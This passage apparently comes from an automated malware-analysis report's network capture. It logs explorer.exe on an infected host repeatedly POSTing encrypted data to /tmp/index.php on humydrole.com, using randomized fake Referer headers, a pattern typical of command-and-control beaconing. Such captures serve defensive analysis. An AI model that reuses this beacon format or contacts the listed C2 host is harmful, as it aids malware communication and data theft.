20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:31.867141962 CET	340	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gptcthkvwjlqsnv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 350 Host: humydrole.com
Nov 30, 2023 11:20:31.867176056 CET	404	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 61 32 db 8b Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA .[k,vua2GPQGzNUIP;1ariaZ^4,RMFm3VTnM1qDd8!dU c32T_>fk[),&~
Nov 30, 2023 11:20:33.019582033 CET	307	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:32 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 8 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 04 00 00 00 72 e8 86 ed Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49757	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:33.319099903 CET	338	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mohsuiyhlgvna.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: humydrole.com
Nov 30, 2023 11:20:33.319137096 CET	243	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 5e 25 b8 bc Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu^%wwArsYdK"hl>cw[17`+PB~!pL,l^m?c?
Nov 30, 2023 11:20:34.485827923 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:33 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:34.709884882 CET	339	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xsddgfubpbqdlm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 308 Host: humydrole.com
Nov 30, 2023 11:20:34.709943056 CET	362	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 38 2b da a2 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu8+nZSglM+?70g{%/``T(7vQ^C #%+D#?Z}[8Q<r9\|gO0~^QBz
Nov 30, 2023 11:20:35.983323097 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:35 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49759	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:36.290379047 CET	341	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tybyseyeviutslah.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 295 Host: humydrole.com
Nov 30, 2023 11:20:36.290402889 CET	349	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3e 0b e8 a7 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu>y8j\m}@~>nl1/S3Q48#V'"NdR'X?&8Mza9^>dsL>*dy[ni~/]
Nov 30, 2023 11:20:37.458934069 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:36 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49760	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:37.749666929 CET	336	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cbwkqjriurp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 329 Host: humydrole.com
Nov 30, 2023 11:20:37.749705076 CET	383	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 26 2a a0 f1 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu&*}PfBvoCYd\|Io1q1hY;<M=\&$SB_\/K$a!XOer?=P"UdRwW\d!9?3m
Nov 30, 2023 11:20:38.877701998 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:38 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49761	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:39.167644978 CET	340	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ncywepvanxpjghh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: humydrole.com
Nov 30, 2023 11:20:39.167675972 CET	205	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 6c 5e c0 b8 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vul^f-ad1aSQ~IC0Q]~ %SAO)]QZp{J>
Nov 30, 2023 11:20:40.442936897 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:39 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49762	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:40.737086058 CET	340	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pgohlrtevwacibm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: humydrole.com
Nov 30, 2023 11:20:40.737119913 CET	367	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 28 03 b1 9b Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu(OSNuo\|s@XZ\j Q}K%=XVwISXfr[$mWA6lyWKy8PBLsGgd$V<
Nov 30, 2023 11:20:42.010325909 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:41 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49763	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:42.311995983 CET	336	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xxsdqqidrvu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: humydrole.com
Nov 30, 2023 11:20:42.312026024 CET	237	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 20 1c b7 ed Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu u'fW5;d8kU`tA-}B2/M@<>]%@YH,x
Nov 30, 2023 11:20:43.512829065 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:42 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49764	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:43.816438913 CET	339	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ykvtqawcffmnvn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 159 Host: humydrole.com
Nov 30, 2023 11:20:43.816479921 CET	213	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 2d 5b f3 a6 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu-[Z2Dt:[zM_2.,F!5u?`"X8Cy;'^Mp(
Nov 30, 2023 11:20:45.011464119 CET	292	IN	HTTP/1.1 200 OK Date: Thu, 30 Nov 2023 10:20:44 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49765	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:45.319993019 CET	339	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qmimbktjcbsrwk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 352 Host: humydrole.com
